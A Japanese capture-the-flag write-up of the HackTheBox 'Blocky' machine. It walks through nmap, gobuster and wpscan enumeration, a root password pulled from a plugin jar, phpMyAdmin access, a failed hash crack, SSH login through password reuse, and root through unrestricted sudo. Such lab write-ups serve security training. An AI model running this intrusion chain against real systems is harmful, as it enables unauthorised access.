🔥

HackTheBox Blocky

2022/09/16に公開

Linux

Blocky

侵入

nmap

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.10.37 -oN nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-16 18:15 JST
PORT      STATE  SERVICE    REASON         VERSION
21/tcp    open   tcpwrapped syn-ack ttl 63
22/tcp    open   tcpwrapped syn-ack ttl 63
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http       syn-ack ttl 63 Apache httpd 2.4.18
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp  closed sophos     reset ttl 63
25565/tcp open   minecraft  syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

21、22、80、8192、25565番ポートを確認

web

gobuster

ディレクトリ探索を行う

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ gobuster dir -u http://blocky.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/16 18:24:24 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]   
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]      
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]  
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]                               
===============================================================
2022/09/16 18:26:15 Finished
===============================================================

WordPress で作成されていることがわかる
気になる出力としては、plugins や xmlrpc.php などがある

wpscan

WordPress を確認したので実行しておく

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ wpscan --url http://blocky.htb/ --api-token [token] --enumerate p,u --plugins-detection aggressive
===============================================================
[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 ===============================================================

特に気になる出力はなかったが、ユーザの存在を確認できた

plugins

アクセスすると、２つの jar ファイルを発見

BlockyCore.jar

ダウンロードし、unzip で解凍する

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ unzip BlockyCore.jar -d blocky
Archive:  BlockyCore.jar
  inflating: blocky/META-INF/MANIFEST.MF  
  inflating: blocky/com/myfirstplugin/BlockyCore.class

中身を探索してみる

┌──(kali㉿kali)-[~/…/Blocky/blocky/com/myfirstplugin]
└─$ cat BlockyCore.class 
localhost
root
8YsqfCTnvxAUeduzjNSXe22

8YsqfCTnvxAUeduzjNSXe22 というパスワードらしき文字列を発見(出力は整形しています)

phpmyadmin

ディレクトリ探索で、phpmyadmin を確認していたので、パスワードが使用できるかを試す

username : root
password : 8YsqfCTnvxAUeduzjNSXe2

ログインに成功した

wp_user

テーブルを探索すると、wp_user を発見

パスワードとして、ハッシュ化された文字列 $P$ BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/ を発見

john

ハッシュ化を復号するために、john を実行

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                 
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:09:08 DONE (2022-09-16 19:37) 0g/s 26154p/s 26154c/s 26154C/s  joefeher..*7¡Vamos!
Session completed

復号に成功できなかった

notch としてのシェル

SSH

パスワードを他に使用していないか試すため、SSH を実行してみる

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ ssh notch@10.10.10.37                                                           
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ whoami
notch

シェルを取得できた

user フラグ

notch@Blocky:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

フラグ取得

権限昇格

sudo

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

sudo が実行できてしまった

root としてのシェル

/bin/sh

notch@Blocky:~$ sudo -u root /bin/sh
# whoami
root

権限昇格成功

root フラグ

# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx